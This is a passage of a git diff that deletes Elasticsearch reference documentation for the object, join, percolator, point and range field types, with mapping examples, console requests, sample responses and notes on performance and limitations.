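<2> `10.994` is therefore stored internally as the long `1099`, and all search-time operations (queries, aggregations, sorting) behave as if the document held `10.99`.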
diff --git a/docs/reference/mapping/types/object.asciidoc b/docs/reference/mapping/types/object.asciidoc deleted file mode 100644 index 0a68bb3b2e7..00000000000 --- a/docs/reference/mapping/types/object.asciidoc +++ /dev/null @@ -1,100 +0,0 @@ -[[object]] -=== Object field type -++++ -Object -++++ - -JSON documents are hierarchical in nature: the document may contain inner -objects which, in turn, may contain inner objects themselves: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ <1> - "region": "US", - "manager": { <2> - "age": 30, - "name": { <3> - "first": "John", - "last": "Smith" - } - } -} --------------------------------------------------- - -<1> The outer document is also a JSON object. -<2> It contains an inner object called `manager`. -<3> Which in turn contains an inner object called `name`. - -Internally, this document is indexed as a simple, flat list of key-value -pairs, something like this: - -[source,js] --------------------------------------------------- -{ - "region": "US", - "manager.age": 30, - "manager.name.first": "John", - "manager.name.last": "Smith" -} --------------------------------------------------- -// NOTCONSOLE - -An explicit mapping for the above document could look like this: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { <1> - "region": { - "type": "keyword" - }, - "manager": { <2> - "properties": { - "age": { "type": "integer" }, - "name": { <3> - "properties": { - "first": { "type": "text" }, - "last": { "type": "text" } - } - } - } - } - } - } -} --------------------------------------------------- - -<1> Properties in the top-level mappings definition. -<2> The `manager` field is an inner `object` field. -<3> The `manager.name` field is an inner `object` field within the `manager` field. - -You are not required to set the field `type` to `object` explicitly, as this is the default value. - -[[object-params]] -==== Parameters for `object` fields - -The following parameters are accepted by `object` fields: - -[horizontal] -<>:: - - Whether or not new `properties` should be added dynamically - to an existing object. Accepts `true` (default), `false` - and `strict`. - -<>:: - - Whether the JSON value given for the object field should be - parsed and indexed (`true`, default) or completely ignored (`false`). - -<>:: - - The fields within the object, which can be of any - <>, including `object`. New properties - may be added to an existing object. - -IMPORTANT: If you need to index arrays of objects instead of single objects, -read <> first. diff --git a/docs/reference/mapping/types/parent-join.asciidoc b/docs/reference/mapping/types/parent-join.asciidoc deleted file mode 100644 index 4960bcae588..00000000000 --- a/docs/reference/mapping/types/parent-join.asciidoc +++ /dev/null @@ -1,439 +0,0 @@ -[[parent-join]] -=== Join field type -++++ -Join -++++ - -The `join` data type is a special field that creates -parent/child relation within documents of the same index. -The `relations` section defines a set of possible relations within the documents, -each relation being a parent name and a child name. 
-A parent/child relation can be defined as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_id": { - "type": "keyword" - }, - "my_join_field": { <1> - "type": "join", - "relations": { - "question": "answer" <2> - } - } - } - } -} --------------------------------------------------- - -<1> The name for the field -<2> Defines a single relation where `question` is parent of `answer`. - -To index a document with a join, the name of the relation and the optional parent -of the document must be provided in the `source`. -For instance the following example creates two `parent` documents in the `question` context: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "my_id": "1", - "text": "This is a question", - "my_join_field": { - "name": "question" <1> - } -} - -PUT my-index-000001/_doc/2?refresh -{ - "my_id": "2", - "text": "This is another question", - "my_join_field": { - "name": "question" - } -} --------------------------------------------------- -// TEST[continued] - -<1> This document is a `question` document. - -When indexing parent documents, you can choose to specify just the name of the relation -as a shortcut instead of encapsulating it in the normal object notation: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "my_id": "1", - "text": "This is a question", - "my_join_field": "question" <1> -} - -PUT my-index-000001/_doc/2?refresh -{ - "my_id": "2", - "text": "This is another question", - "my_join_field": "question" -} --------------------------------------------------- -// TEST[continued] - -<1> Simpler notation for a parent document just uses the relation name. - -When indexing a child, the name of the relation as well as the parent id of the document -must be added in the `_source`. - -WARNING: It is required to index the lineage of a parent in the same shard so you must -always route child documents using their greater parent id. - -For instance the following example shows how to index two `child` documents: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/3?routing=1&refresh <1> -{ - "my_id": "3", - "text": "This is an answer", - "my_join_field": { - "name": "answer", <2> - "parent": "1" <3> - } -} - -PUT my-index-000001/_doc/4?routing=1&refresh -{ - "my_id": "4", - "text": "This is another answer", - "my_join_field": { - "name": "answer", - "parent": "1" - } -} --------------------------------------------------- -// TEST[continued] - -<1> The routing value is mandatory because parent and child documents must be indexed on the same shard -<2> `answer` is the name of the join for this document -<3> The parent id of this child document - -==== Parent-join and performance - -The join field shouldn't be used like joins in a relation database. In Elasticsearch the key to good performance -is to de-normalize your data into documents. Each join field, `has_child` or `has_parent` query adds a -significant tax to your query performance. It can also trigger <> to be built. - -The only case where the join field makes sense is if your data contains a one-to-many relationship where -one entity significantly outnumbers the other entity. An example of such case is a use case with products -and offers for these products. 
In the case that offers significantly outnumbers the number of products then -it makes sense to model the product as parent document and the offer as child document. - -==== Parent-join restrictions - -* Only one `join` field mapping is allowed per index. -* Parent and child documents must be indexed on the same shard. - This means that the same `routing` value needs to be provided when - <>, <>, or <> - a child document. -* An element can have multiple children but only one parent. -* It is possible to add a new relation to an existing `join` field. -* It is also possible to add a child to an existing element - but only if the element is already a parent. - -==== Searching with parent-join - -The parent-join creates one field to index the name of the relation -within the document (`my_parent`, `my_child`, ...). - -It also creates one field per parent/child relation. -The name of this field is the name of the `join` field followed by `#` and the -name of the parent in the relation. -So for instance for the `my_parent` -> [`my_child`, `another_child`] relation, -the `join` field creates an additional field named `my_join_field#my_parent`. - -This field contains the parent `_id` that the document links to -if the document is a child (`my_child` or `another_child`) and the `_id` of -document if it's a parent (`my_parent`). - -When searching an index that contains a `join` field, these two fields are always -returned in the search response: - -[source,console] --------------------------- -GET my-index-000001/_search -{ - "query": { - "match_all": {} - }, - "sort": ["my_id"] -} --------------------------- -// TEST[continued] - -Will return: - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total": { - "value": 4, - "relation": "eq" - }, - "max_score": null, - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_score": null, - "_source": { - "my_id": "1", - "text": "This is a question", - "my_join_field": "question" <1> - }, - "sort": [ - "1" - ] - }, - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "2", - "_score": null, - "_source": { - "my_id": "2", - "text": "This is another question", - "my_join_field": "question" <2> - }, - "sort": [ - "2" - ] - }, - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "3", - "_score": null, - "_routing": "1", - "_source": { - "my_id": "3", - "text": "This is an answer", - "my_join_field": { - "name": "answer", <3> - "parent": "1" <4> - } - }, - "sort": [ - "3" - ] - }, - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "4", - "_score": null, - "_routing": "1", - "_source": { - "my_id": "4", - "text": "This is another answer", - "my_join_field": { - "name": "answer", - "parent": "1" - } - }, - "sort": [ - "4" - ] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] - -<1> This document belongs to the `question` join -<2> This document belongs to the `question` join -<3> This document belongs to the `answer` join -<4> The linked parent id for the child document - -==== Parent-join queries and aggregations - -See the <> and -<> queries, -the <> aggregation, -and <> for more information. 
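As a quick illustration of how these relate to the example mapping above, the following is a minimal
sketch of a `has_child` query that returns `question` documents having at least one matching `answer`
child. The query text is illustrative:

[source,console]
--------------------------
GET my-index-000001/_search
{
  "query": {
    "has_child": {
      "type": "answer",
      "query": {
        "match": {
          "text": "answer"
        }
      }
    }
  }
}
--------------------------

With the documents indexed above, this returns the `question` document with `_id` `1`, since it is the
only parent with matching `answer` children. How the scores of the matching children contribute to the
parent score can be controlled with the optional `score_mode` parameter of the `has_child` query.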
- -The value of the `join` field is accessible in aggregations -and scripts, and may be queried with the -<>: - -[source,console] --------------------------- -GET my-index-000001/_search -{ - "query": { - "parent_id": { <1> - "type": "answer", - "id": "1" - } - }, - "aggs": { - "parents": { - "terms": { - "field": "my_join_field#question", <2> - "size": 10 - } - } - }, - "script_fields": { - "parent": { - "script": { - "source": "doc['my_join_field#question']" <3> - } - } - } -} --------------------------- -// TEST[continued] - -<1> Querying the `parent id` field (also see the <> and the <>) -<2> Aggregating on the `parent id` field (also see the <> aggregation) -<3> Accessing the parent id` field in scripts - - -==== Global ordinals - -The `join` field uses <> to speed up joins. -Global ordinals need to be rebuilt after any change to a shard. The more -parent id values are stored in a shard, the longer it takes to rebuild the -global ordinals for the `join` field. - -Global ordinals, by default, are built eagerly: if the index has changed, -global ordinals for the `join` field will be rebuilt as part of the refresh. -This can add significant time to the refresh. However most of the times this is the -right trade-off, otherwise global ordinals are rebuilt when the first parent-join -query or aggregation is used. This can introduce a significant latency spike for -your users and usually this is worse as multiple global ordinals for the `join` -field may be attempt rebuilt within a single refresh interval when many writes -are occurring. - -When the `join` field is used infrequently and writes occur frequently it may -make sense to disable eager loading: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_join_field": { - "type": "join", - "relations": { - "question": "answer" - }, - "eager_global_ordinals": false - } - } - } -} --------------------------------------------------- - -The amount of heap used by global ordinals can be checked per parent relation -as follows: - -[source,console] --------------------------------------------------- -# Per-index -GET _stats/fielddata?human&fields=my_join_field#question - -# Per-node per-index -GET _nodes/stats/indices/fielddata?human&fields=my_join_field#question --------------------------------------------------- -// TEST[continued] - -==== Multiple children per parent - -It is also possible to define multiple children for a single parent: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_join_field": { - "type": "join", - "relations": { - "question": ["answer", "comment"] <1> - } - } - } - } -} --------------------------------------------------- - -<1> `question` is parent of `answer` and `comment`. - -==== Multiple levels of parent join - -WARNING: Using multiple levels of relations to replicate a relational model is not recommended. -Each level of relation adds an overhead at query time in terms of memory and computation. -You should de-normalize your data if you care about performance. 
- -Multiple levels of parent/child: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_join_field": { - "type": "join", - "relations": { - "question": ["answer", "comment"], <1> - "answer": "vote" <2> - } - } - } - } -} --------------------------------------------------- - -<1> `question` is parent of `answer` and `comment` -<2> `answer` is parent of `vote` - -The mapping above represents the following tree: - - question - / \ - / \ - comment answer - | - | - vote - -Indexing a grandchild document requires a `routing` value equals -to the grand-parent (the greater parent of the lineage): - - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/3?routing=1&refresh <1> -{ - "text": "This is a vote", - "my_join_field": { - "name": "vote", - "parent": "2" <2> - } -} --------------------------------------------------- -// TEST[continued] - -<1> This child document must be on the same shard than its grand-parent and parent -<2> The parent id of this document (must points to an `answer` document) diff --git a/docs/reference/mapping/types/percolator.asciidoc b/docs/reference/mapping/types/percolator.asciidoc deleted file mode 100644 index 496941d4143..00000000000 --- a/docs/reference/mapping/types/percolator.asciidoc +++ /dev/null @@ -1,741 +0,0 @@ -[[percolator]] -=== Percolator field type -++++ -Percolator -++++ - -The `percolator` field type parses a json structure into a native query and -stores that query, so that the <> -can use it to match provided documents. - -Any field that contains a json object can be configured to be a percolator -field. The percolator field type has no settings. Just configuring the `percolator` -field type is sufficient to instruct Elasticsearch to treat a field as a -query. - -If the following mapping configures the `percolator` field type for the -`query` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "query": { - "type": "percolator" - }, - "field": { - "type": "text" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -Then you can index a query: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/match_value -{ - "query": { - "match": { - "field": "value" - } - } -} --------------------------------------------------- - -[IMPORTANT] -===================================== - -Fields referred to in a percolator query must *already* exist in the mapping -associated with the index used for percolation. In order to make sure these fields exist, -add or update a mapping via the <> or <> APIs. - -===================================== - -[discrete] -==== Reindexing your percolator queries - -Reindexing percolator queries is sometimes required to benefit from improvements made to the `percolator` field type in -new releases. - -Reindexing percolator queries can be reindexed by using the <>. 
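Before walking through the reindex example below, it may help to see the stored query in action. The
following is a minimal sketch that percolates a document against the `match_value` query indexed
above; the document body is illustrative:

[source,console]
--------------------------------------------------
GET my-index-000001/_search
{
  "query": {
    "percolate": {
      "field": "query",
      "document": {
        "field": "value"
      }
    }
  }
}
--------------------------------------------------

The `match_value` query document is returned as a hit, together with a `_percolator_document_slot`
field that indicates which of the provided documents matched.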
-Lets take a look at the following index with a percolator field type: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "query" : { - "type" : "percolator" - }, - "body" : { - "type": "text" - } - } - } -} - -POST _aliases -{ - "actions": [ - { - "add": { - "index": "index", - "alias": "queries" <1> - } - } - ] -} - -PUT queries/_doc/1?refresh -{ - "query" : { - "match" : { - "body" : "quick brown fox" - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> It is always recommended to define an alias for your index, so that in case of a reindex systems / applications - don't need to be changed to know that the percolator queries are now in a different index. - -Lets say you're going to upgrade to a new major version and in order for the new Elasticsearch version to still be able -to read your queries you need to reindex your queries into a new index on the current Elasticsearch version: - -[source,console] --------------------------------------------------- -PUT new_index -{ - "mappings": { - "properties": { - "query" : { - "type" : "percolator" - }, - "body" : { - "type": "text" - } - } - } -} - -POST /_reindex?refresh -{ - "source": { - "index": "index" - }, - "dest": { - "index": "new_index" - } -} - -POST _aliases -{ - "actions": [ <1> - { - "remove": { - "index" : "index", - "alias": "queries" - } - }, - { - "add": { - "index": "new_index", - "alias": "queries" - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -<1> If you have an alias don't forget to point it to the new index. - -Executing the `percolate` query via the `queries` alias: - -[source,console] --------------------------------------------------- -GET /queries/_search -{ - "query": { - "percolate" : { - "field" : "query", - "document" : { - "body" : "fox jumps over the lazy dog" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -now returns matches from the new index: - -[source,console-result] --------------------------------------------------- -{ - "took": 3, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.13076457, - "hits": [ - { - "_index": "new_index", <1> - "_type": "_doc", - "_id": "1", - "_score": 0.13076457, - "_source": { - "query": { - "match": { - "body": "quick brown fox" - } - } - }, - "fields" : { - "_percolator_document_slot" : [0] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 3,/"took": "$body.took",/] - -<1> Percolator query hit is now being presented from the new index. - -[discrete] -==== Optimizing query time text analysis - -When the percolator verifies a percolator candidate match it is going to parse, perform query time text analysis and actually run -the percolator query on the document being percolated. This is done for each candidate match and every time the `percolate` query executes. -If your query time text analysis is relatively expensive part of query parsing then text analysis can become the -dominating factor time is being spent on when percolating. This query parsing overhead can become noticeable when the -percolator ends up verifying many candidate percolator query matches. - -To avoid the most expensive part of text analysis at percolate time. 
One can choose to do the expensive part of text analysis -when indexing the percolator query. This requires using two different analyzers. The first analyzer actually performs -text analysis that needs be performed (expensive part). The second analyzer (usually whitespace) just splits the generated tokens -that the first analyzer has produced. Then before indexing a percolator query, the analyze api should be used to analyze the query -text with the more expensive analyzer. The result of the analyze api, the tokens, should be used to substitute the original query -text in the percolator query. It is important that the query should now be configured to override the analyzer from the mapping and -just the second analyzer. Most text based queries support an `analyzer` option (`match`, `query_string`, `simple_query_string`). -Using this approach the expensive text analysis is performed once instead of many times. - -Lets demonstrate this workflow via a simplified example. - -Lets say we want to index the following percolator query: - -[source,js] --------------------------------------------------- -{ - "query" : { - "match" : { - "body" : { - "query" : "missing bicycles" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -with these settings and mapping: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer" : { - "tokenizer": "standard", - "filter" : ["lowercase", "porter_stem"] - } - } - } - }, - "mappings": { - "properties": { - "query" : { - "type": "percolator" - }, - "body" : { - "type": "text", - "analyzer": "my_analyzer" <1> - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> For the purpose of this example, this analyzer is considered expensive. - -First we need to use the analyze api to perform the text analysis prior to indexing: - -[source,console] --------------------------------------------------- -POST /test_index/_analyze -{ - "analyzer" : "my_analyzer", - "text" : "missing bicycles" -} --------------------------------------------------- -// TEST[continued] - -This results the following response: - -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "miss", - "start_offset": 0, - "end_offset": 7, - "type": "", - "position": 0 - }, - { - "token": "bicycl", - "start_offset": 8, - "end_offset": 16, - "type": "", - "position": 1 - } - ] -} --------------------------------------------------- - -All the tokens in the returned order need to replace the query text in the percolator query: - -[source,console] --------------------------------------------------- -PUT /test_index/_doc/1?refresh -{ - "query" : { - "match" : { - "body" : { - "query" : "miss bicycl", - "analyzer" : "whitespace" <1> - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> It is important to select a whitespace analyzer here, otherwise the analyzer defined in the mapping will be used, -which defeats the point of using this workflow. Note that `whitespace` is a built-in analyzer, if a different analyzer -needs to be used, it needs to be configured first in the index's settings. - -The analyze api prior to the indexing the percolator flow should be done for each percolator query. 
- -At percolate time nothing changes and the `percolate` query can be defined normally: - -[source,console] --------------------------------------------------- -GET /test_index/_search -{ - "query": { - "percolate" : { - "field" : "query", - "document" : { - "body" : "Bycicles are missing" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -This results in a response like this: - -[source,console-result] --------------------------------------------------- -{ - "took": 6, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.13076457, - "hits": [ - { - "_index": "test_index", - "_type": "_doc", - "_id": "1", - "_score": 0.13076457, - "_source": { - "query": { - "match": { - "body": { - "query": "miss bicycl", - "analyzer": "whitespace" - } - } - } - }, - "fields" : { - "_percolator_document_slot" : [0] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 6,/"took": "$body.took",/] - -[discrete] -==== Optimizing wildcard queries. - -Wildcard queries are more expensive than other queries for the percolator, -especially if the wildcard expressions are large. - -In the case of `wildcard` queries with prefix wildcard expressions or just the `prefix` query, -the `edge_ngram` token filter can be used to replace these queries with regular `term` -query on a field where the `edge_ngram` token filter is configured. - -Creating an index with custom analysis settings: - -[source,console] --------------------------------------------------- -PUT my_queries1 -{ - "settings": { - "analysis": { - "analyzer": { - "wildcard_prefix": { <1> - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "wildcard_edge_ngram" - ] - } - }, - "filter": { - "wildcard_edge_ngram": { <2> - "type": "edge_ngram", - "min_gram": 1, - "max_gram": 32 - } - } - } - }, - "mappings": { - "properties": { - "query": { - "type": "percolator" - }, - "my_field": { - "type": "text", - "fields": { - "prefix": { <3> - "type": "text", - "analyzer": "wildcard_prefix", - "search_analyzer": "standard" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The analyzer that generates the prefix tokens to be used at index time only. -<2> Increase the `min_gram` and decrease `max_gram` settings based on your prefix search needs. -<3> This multifield should be used to do the prefix search - with a `term` or `match` query instead of a `prefix` or `wildcard` query. - - -Then instead of indexing the following query: - -[source,js] --------------------------------------------------- -{ - "query": { - "wildcard": { - "my_field": "abc*" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -this query below should be indexed: - -[source,console] --------------------------------------------------- -PUT /my_queries1/_doc/1?refresh -{ - "query": { - "term": { - "my_field.prefix": "abc" - } - } -} --------------------------------------------------- -// TEST[continued] - -This way can handle the second query more efficiently than the first query. 
- -The following search request will match with the previously indexed -percolator query: - -[source,console] --------------------------------------------------- -GET /my_queries1/_search -{ - "query": { - "percolate": { - "field": "query", - "document": { - "my_field": "abcd" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 6, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.18864399, - "hits": [ - { - "_index": "my_queries1", - "_type": "_doc", - "_id": "1", - "_score": 0.18864399, - "_source": { - "query": { - "term": { - "my_field.prefix": "abc" - } - } - }, - "fields": { - "_percolator_document_slot": [ - 0 - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 6,/"took": "$body.took",/] - -The same technique can also be used to speed up suffix -wildcard searches. By using the `reverse` token filter -before the `edge_ngram` token filter. - -[source,console] --------------------------------------------------- -PUT my_queries2 -{ - "settings": { - "analysis": { - "analyzer": { - "wildcard_suffix": { - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "reverse", - "wildcard_edge_ngram" - ] - }, - "wildcard_suffix_search_time": { - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "reverse" - ] - } - }, - "filter": { - "wildcard_edge_ngram": { - "type": "edge_ngram", - "min_gram": 1, - "max_gram": 32 - } - } - } - }, - "mappings": { - "properties": { - "query": { - "type": "percolator" - }, - "my_field": { - "type": "text", - "fields": { - "suffix": { - "type": "text", - "analyzer": "wildcard_suffix", - "search_analyzer": "wildcard_suffix_search_time" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> A custom analyzer is needed at search time too, because otherwise - the query terms are not being reversed and would otherwise not match - with the reserved suffix tokens. - -Then instead of indexing the following query: - -[source,js] --------------------------------------------------- -{ - "query": { - "wildcard": { - "my_field": "*xyz" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -the following query below should be indexed: - -[source,console] --------------------------------------------------- -PUT /my_queries2/_doc/2?refresh -{ - "query": { - "match": { <1> - "my_field.suffix": "xyz" - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The `match` query should be used instead of the `term` query, - because text analysis needs to reverse the query terms. - -The following search request will match with the previously indexed -percolator query: - -[source,console] --------------------------------------------------- -GET /my_queries2/_search -{ - "query": { - "percolate": { - "field": "query", - "document": { - "my_field": "wxyz" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -==== Dedicated Percolator Index - -Percolate queries can be added to any index. Instead of adding percolate queries to the index the data resides in, -these queries can also be added to a dedicated index. 
The advantage of this is that a dedicated percolator index
-can have its own index settings (for example, the number of primary and replica shards). If you choose to have a dedicated
-percolate index, you need to make sure that the mappings from the normal index are also available on the percolate index.
-Otherwise, percolate queries can be parsed incorrectly.
-
-[discrete]
-==== Forcing Unmapped Fields to be Handled as Strings
-
-In certain cases it is unknown what kind of percolator queries will be registered, and if no field mapping exists for fields
-that are referred to by percolator queries, then adding a percolator query fails. This means the mapping needs to be updated
-to have the field with the appropriate settings, and then the percolator query can be added. But sometimes it is sufficient
-if all unmapped fields are handled as if they were default text fields. In those cases one can set the
-`index.percolator.map_unmapped_fields_as_text` setting to `true` (defaults to `false`). Then, if a field referred to in
-a percolator query does not exist, it is handled as a default text field so that adding the percolator query doesn't
-fail.
-
-[discrete]
-==== Limitations
-
-[discrete]
-[[parent-child]]
-===== Parent/child
-
-Because the `percolate` query processes one document at a time, it doesn't support queries and filters that run
-against child documents such as `has_child` and `has_parent`.
-
-[discrete]
-===== Fetching queries
-
-There are a number of queries that fetch data via a get call during query parsing, for example the `terms` query when
-using terms lookup, the `template` query when using indexed scripts, and the `geo_shape` query when using pre-indexed shapes.
-When these queries are indexed by the `percolator` field type, the get call is executed once. So each time the `percolator`
-query evaluates these queries, the terms, shapes, etc. that were fetched at index time are used. Note that this
-fetching happens each time the percolator query is indexed, on both primary
-and replica shards, so the terms that are actually indexed can differ between shard copies if the source index
-changed while indexing.
-
-[discrete]
-===== Script query
-
-The script inside a `script` query can only access doc values fields. The `percolate` query indexes the provided document
-into an in-memory index. This in-memory index doesn't support stored fields, and because of that the `_source` field and
-other stored fields are not stored. This is the reason why the `_source` and other stored fields
-aren't available in the `script` query.
-
-[discrete]
-===== Field aliases
-
-Percolator queries that contain <> may not always behave as expected. In particular, if a
-percolator query is registered that contains a field alias, and that alias is later updated in the mappings to refer
-to a different field, the stored query will still refer to the original target field. To pick up the change to
-the field alias, the percolator query must be explicitly reindexed.
diff --git a/docs/reference/mapping/types/point.asciidoc b/docs/reference/mapping/types/point.asciidoc
deleted file mode 100644
index f0645ef1e65..00000000000
--- a/docs/reference/mapping/types/point.asciidoc
+++ /dev/null
@@ -1,99 +0,0 @@
-[[point]]
-[role="xpack"]
-[testenv="basic"]
-=== Point field type
-++++
-Point
-++++
-
-The `point` data type facilitates the indexing and searching
-of arbitrary `x, y` pairs that fall in a 2-dimensional planar
-coordinate system.
- -You can query documents using this type using -<>. - -There are four ways that a point may be specified, as demonstrated below: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "location": { - "type": "point" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Point as an object", - "location": { <1> - "x": 41.12, - "y": -71.34 - } -} - -PUT my-index-000001/_doc/2 -{ - "text": "Point as a string", - "location": "41.12,-71.34" <2> -} - - -PUT my-index-000001/_doc/4 -{ - "text": "Point as an array", - "location": [41.12, -71.34] <3> -} - -PUT my-index-000001/_doc/5 -{ - "text": "Point as a WKT POINT primitive", - "location" : "POINT (41.12 -71.34)" <4> -} - --------------------------------------------------- - -<1> Point expressed as an object, with `x` and `y` keys. -<2> Point expressed as a string with the format: `"x,y"`. -<3> Point expressed as an array with the format: [ `x`, `y`] -<4> Point expressed as a https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -POINT with the format: `"POINT(x y)"` - -The coordinates provided to the indexer are single precision floating point values so -the field guarantees the same accuracy provided by the java virtual machine (typically -`1E-38`). - -[[point-params]] -==== Parameters for `point` fields - -The following parameters are accepted by `point` fields: - -[horizontal] - -<>:: - - If `true`, malformed points are ignored. If `false` (default), - malformed points throw an exception and reject the whole document. - -`ignore_z_value`:: - - If `true` (default) three dimension points will be accepted (stored in source) - but only x and y values will be indexed; the third dimension is - ignored. If `false`, points containing any more than x and y - (two dimensions) values throw an exception and reject the whole document. - -<>:: - - Accepts an point value which is substituted for any explicit `null` values. - Defaults to `null`, which means the field is treated as missing. - -==== Sorting and retrieving points - -It is currently not possible to sort points or retrieve their fields -directly. The `point` value is only retrievable through the `_source` -field. diff --git a/docs/reference/mapping/types/range.asciidoc b/docs/reference/mapping/types/range.asciidoc deleted file mode 100644 index 4d75b6d6ac1..00000000000 --- a/docs/reference/mapping/types/range.asciidoc +++ /dev/null @@ -1,238 +0,0 @@ -[[range]] -=== Range field types -++++ -Range -++++ - -Range field types represent a continuous range of values between an upper and lower -bound. For example, a range can represent _any date in October_ or _any -integer from 0 to 9_. They are defined using the operators -`gt` or `gte` for the lower bound, and `lt` or `lte` for the upper bound. -They can be used for querying, and have -limited support for aggregations. The only supported aggregations are -{ref}/search-aggregations-bucket-histogram-aggregation.html[histogram], -{ref}/search-aggregations-metrics-cardinality-aggregation.html[cardinality]. - -The following range types are supported: - -[horizontal] -`integer_range`:: A range of signed 32-bit integers with a minimum value of +-2^31^+ and maximum of +2^31^-1+. -`float_range`:: A range of single-precision 32-bit IEEE 754 floating point values. -`long_range`:: A range of signed 64-bit integers with a minimum value of +-2^63^+ and maximum of +2^63^-1+. -`double_range`:: A range of double-precision 64-bit IEEE 754 floating point values. 
-`date_range`:: A range of <> values. Date ranges support various date formats - through the <> mapping parameter. Regardless of - the format used, date values are parsed into an unsigned 64-bit integer - representing milliseconds since the Unix epoch in UTC. Values containing the - `now` <> expression are not supported. -`ip_range` :: A range of ip values supporting either {wikipedia}/IPv4[IPv4] or - {wikipedia}/IPv6[IPv6] (or mixed) addresses. - -Below is an example of configuring a mapping with various range fields followed by an example that indexes several range types. - -[source,console] --------------------------------------------------- -PUT range_index -{ - "settings": { - "number_of_shards": 2 - }, - "mappings": { - "properties": { - "expected_attendees": { - "type": "integer_range" - }, - "time_frame": { - "type": "date_range", <1> - "format": "yyyy-MM-dd HH:mm:ss||yyyy-MM-dd||epoch_millis" - } - } - } -} - -PUT range_index/_doc/1?refresh -{ - "expected_attendees" : { <2> - "gte" : 10, - "lt" : 20 - }, - "time_frame" : { - "gte" : "2015-10-31 12:00:00", <3> - "lte" : "2015-11-01" - } -} --------------------------------------------------- -// TESTSETUP - -<1> `date_range` types accept the same field parameters defined by the <> type. -<2> Example indexing a meeting with 10 to 20 attendees, not including 20. -<3> Example date range using date time stamp. - -The following is an example of a <> on the `integer_range` field named "expected_attendees". -12 is a value inside the range, so it will match. - -[source,console] --------------------------------------------------- -GET range_index/_search -{ - "query" : { - "term" : { - "expected_attendees" : { - "value": 12 - } - } - } -} --------------------------------------------------- - -The result produced by the above query. - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards" : { - "total": 2, - "successful": 2, - "skipped" : 0, - "failed": 0 - }, - "hits" : { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "range_index", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "expected_attendees" : { - "gte" : 10, "lt" : 20 - }, - "time_frame" : { - "gte" : "2015-10-31 12:00:00", "lte" : "2015-11-01" - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13/"took" : $body.took/] - -The following is an example of a `date_range` query over the `date_range` field named "time_frame". - -[source,console] --------------------------------------------------- -GET range_index/_search -{ - "query" : { - "range" : { - "time_frame" : { <1> - "gte" : "2015-10-31", - "lte" : "2015-11-01", - "relation" : "within" <2> - } - } - } -} --------------------------------------------------- - -<1> Range queries work the same as described in <>. -<2> Range queries over range <> support a `relation` parameter which can be one of `WITHIN`, `CONTAINS`, - `INTERSECTS` (default). 
